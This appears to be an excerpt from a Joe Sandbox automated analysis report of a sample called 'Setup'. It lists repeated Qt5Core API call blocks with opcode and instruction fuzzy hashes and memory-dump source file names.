                                                                                                                                                              • Opcode Fuzzy Hash: 4f89a7bd79c910d508725fd5ba1dedc689b4453c5fc429dfddd45550c3d0a5fd
                                                                                                                                                              • Instruction Fuzzy Hash: E82151A2A1AA9182DB51DF22E4001BDA7A4FB88FD8F444131EE4E47B69DF3CD546CB04
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 5cef78b84985dba592012a81106e810f23f6ba4120244e86853fc0b3cba040a9
                                                                                                                                                              • Instruction ID: f0383e07d3c9ef64741ea785dd2ddc6307b094e83102028c4f1854f81c63dc85
                                                                                                                                                              • Opcode Fuzzy Hash: 5cef78b84985dba592012a81106e810f23f6ba4120244e86853fc0b3cba040a9
                                                                                                                                                              • Instruction Fuzzy Hash: 2E118176B0AB4582DF918B2AFA400686365EF99FD4B588032DE6E07B55EE3CD491CF40
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 8a76a5ee6de2f8c11a31c37ba44cdf188a574f502ac536c817f3c257da9ac117
                                                                                                                                                              • Instruction ID: c6c10040b7012c7ccda6bb2d3774b738d66eae19a7b01324761b098b9d8b68e7
                                                                                                                                                              • Opcode Fuzzy Hash: 8a76a5ee6de2f8c11a31c37ba44cdf188a574f502ac536c817f3c257da9ac117
                                                                                                                                                              • Instruction Fuzzy Hash: 8F11C376B0AB4582DF819B2AF9400686361EF88FD4B188031DF5E07B55EE3CD4A2CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F4681
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F468F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F469B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F46A7
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 84010254d9851169a922b32df67799f54acccfae53e50c5a9a601f9c19406162
                                                                                                                                                              • Instruction ID: ba35573b3f5ca766f6f92a2d4c4e8e96060de68f639f53501c611b5976907de9
                                                                                                                                                              • Opcode Fuzzy Hash: 84010254d9851169a922b32df67799f54acccfae53e50c5a9a601f9c19406162
                                                                                                                                                              • Instruction Fuzzy Hash: A8119D76B1AA4282EB919B76E84406963A1FB86FE4F18C131DE5D07794DF3CD446CB00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: b41c966b74ed0d0afa28fd168af327f74ad23524564dbb52fe90dc3ffa51632b
                                                                                                                                                              • Instruction ID: 8de19b73924bb2958b2e8664e690c4f41e7a42ff320ed4421dc5b7230931a9f4
                                                                                                                                                              • Opcode Fuzzy Hash: b41c966b74ed0d0afa28fd168af327f74ad23524564dbb52fe90dc3ffa51632b
                                                                                                                                                              • Instruction Fuzzy Hash: 46119476B1AB4582EF968F26E8545282361BB88FE4B488135DE5D07B54DF3CD896CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A0149B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A014A4
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A014B0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A014BC
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: d8988c66a6d0efb2ba259f8e63d720c80a45c97f5582013f3770068f8d57d101
                                                                                                                                                              • Instruction ID: 1ebb556271cbc092d847ad6ae61fe8f86c86f43f21ef3dc5c83a90bb9dd4500f
                                                                                                                                                              • Opcode Fuzzy Hash: d8988c66a6d0efb2ba259f8e63d720c80a45c97f5582013f3770068f8d57d101
                                                                                                                                                              • Instruction Fuzzy Hash: 45119476B0AB4586DF919F26F9400697365EB88FD4F184032EF5E47765EE3CD4518B00
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2143B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21444
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21450
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2145C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 8e8c00a9605bb67929e0104b86af25edf0759ba6105ff315aba7609bb1735cfe
                                                                                                                                                              • Instruction ID: 3b0dc6b0b7ed2b453d32ec883a1fd6e3d4ca24e5ddcb73ed26d545dc3d22b3fc
                                                                                                                                                              • Opcode Fuzzy Hash: 8e8c00a9605bb67929e0104b86af25edf0759ba6105ff315aba7609bb1735cfe
                                                                                                                                                              • Instruction Fuzzy Hash: B711E7B6B0AB4186DF819F26F9400687361EB88FD0B184032DF6E47765EE3CD4918B00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: c1ae22ffda0154e3517a8a9eb5dff9327b787006314421aca953454881f07384
                                                                                                                                                              • Instruction ID: 1cc7ae4044a25b8089729c281c4b19ab08b47fedbbfa46c8ab2e836ed35975fe
                                                                                                                                                              • Opcode Fuzzy Hash: c1ae22ffda0154e3517a8a9eb5dff9327b787006314421aca953454881f07384
                                                                                                                                                              • Instruction Fuzzy Hash: 77118166B09B4182DF919F26F9401A973A1EB88FD4F584031DE5E47B64EF3CD482CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A214EB
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A214F4
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21500
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2150C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 6f7dfb9e89a97e3397ce2e1d8e20e8e6aa21c0779b874b7ab12fb103c7c2f3f3
                                                                                                                                                              • Instruction ID: d48c6cc8ecd08c93dfdf1716807dc6ec88e0125cc000f80c8a6ae881d5cf7a48
                                                                                                                                                              • Opcode Fuzzy Hash: 6f7dfb9e89a97e3397ce2e1d8e20e8e6aa21c0779b874b7ab12fb103c7c2f3f3
                                                                                                                                                              • Instruction Fuzzy Hash: 3F119476B0AB4186DF919F26F9400697365EB89FD0B1C9032DE5E47765EE3CD4918B00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QIODevicePrivate@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987E4D
                                                                                                                                                                • Part of subcall function 00007FFBA19840A0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840C2
                                                                                                                                                                • Part of subcall function 00007FFBA19840A0: ??0QMutex@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840F7
                                                                                                                                                                • Part of subcall function 00007FFBA19840A0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1984113
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987EB6
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987F13
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA19856ED
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA1985748
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1985767
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1987F41
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Data@@HashMutex@@$?allocate?willBasicDeviceGrow@Node@Private@@String@@Timer@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1539146754-0
                                                                                                                                                              • Opcode ID: 30929ce53b2fda68a76e06c993d815f26cbf27f7bf404e4d807ecf3ce2684e56
                                                                                                                                                              • Instruction ID: 2420a9aca7c753f3144af37415dac586fb60003476dd433be92eb77b033b5162
                                                                                                                                                              • Opcode Fuzzy Hash: 30929ce53b2fda68a76e06c993d815f26cbf27f7bf404e4d807ecf3ce2684e56
                                                                                                                                                              • Instruction Fuzzy Hash: EA21F37250AB8681D781CF31E8403D973A8FB58BA8F584136DE9D4B769EF38C195CB60
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197E900: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA197E936
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B1F
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA1973B36
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B42
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B54
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973B77
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B92
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B9E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973BC6
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973C27
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1973C35
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973C3E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973C50
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA197F908
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197F920
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197F92B
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197F98C
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Byte$?begin@Array@@$String@@V0@@$ArrayDataPtr@@@$?detach_grow@?dispose@?end@Data@1@Data@1@@Init_thread_footer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1645541787-0
                                                                                                                                                              • Opcode ID: f5ff48d5ac1192bc4048d39eef1bbb392610cb57c32126d6d65bb1a776deb099
                                                                                                                                                              • Instruction ID: 19d0261e7c3b515ad964b2983f16ca15e53786b56b1ad99c786276ee7aa819e0
                                                                                                                                                              • Opcode Fuzzy Hash: f5ff48d5ac1192bc4048d39eef1bbb392610cb57c32126d6d65bb1a776deb099
                                                                                                                                                              • Instruction Fuzzy Hash: 1C212CA1A0EA8285EB82DB35E8403A53361FF44794F908232DD6E472A5FF3DE945CF14
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ElapsedTimer@@$?elapsed@?restart@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1089445756-0
                                                                                                                                                              • Opcode ID: 67d5462ce0ff3e378cd5ea5da7e28c2e43514b92716f2c947bf9311eb890e950
                                                                                                                                                              • Instruction ID: bb9d16b95fba2043f40cca8d30d3b57dcfbc2c918c4a10a796b5cd7800b8dca6
                                                                                                                                                              • Opcode Fuzzy Hash: 67d5462ce0ff3e378cd5ea5da7e28c2e43514b92716f2c947bf9311eb890e950
                                                                                                                                                              • Instruction Fuzzy Hash: D8116DB2A0AA8181E791CF25E4403E96760FB44B98F584031EE8E476A5DF3DD486CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(00000000,?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E264F
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E265E
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E266B
                                                                                                                                                              • ?unlock@QMutex@@QEAAXXZ.QT5CORE(?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E26B2
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListMutex@@$?begin@?end@?lock@?unlock@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3979743312-0
                                                                                                                                                              • Opcode ID: 66773a8d15c61e9d42ea459106c4e4bbe87b49aa1589364d060b88d8efa0fa82
                                                                                                                                                              • Instruction ID: 79d92cdfd59d4b01f239b2bacdbb0e6263f51f4a29eb35457c06480b048c5753
                                                                                                                                                              • Opcode Fuzzy Hash: 66773a8d15c61e9d42ea459106c4e4bbe87b49aa1589364d060b88d8efa0fa82
                                                                                                                                                              • Instruction Fuzzy Hash: CA113066709B15CADB51EF26E4440E96B64FB88F94B498032EE4E47714EE38C586CB40
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C46
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C50
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C6C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C76
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A364E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A3650D
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A36524
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteDateLogger@@MessageTime@@$?warning@Category@@Enabled@H00@LoggingWarning
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974625209-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QIODevicePrivate@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A281B7,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A05C1D
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A05C4F
                                                                                                                                                                • Part of subcall function 00007FFBA19EC610: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00007FFBA1A281B7,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA19EC62D
                                                                                                                                                                • Part of subcall function 00007FFBA19EC610: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00007FFBA1A281B7,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA19EC637
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A05C9B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A05CD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$BasicDevicePrivate@@Timer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3443080667-0
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F54F0
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F54FD
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F550C
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F551B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteV0@@$BasicTimer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4220465339-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1973056
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA197305F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA197306B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1973077
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1984CE9
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE ref: 00007FFBA1984CF7
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1984D03
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1984D0F
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EB7
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EC5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@Array@@ByteV0@@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 414843946-0
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
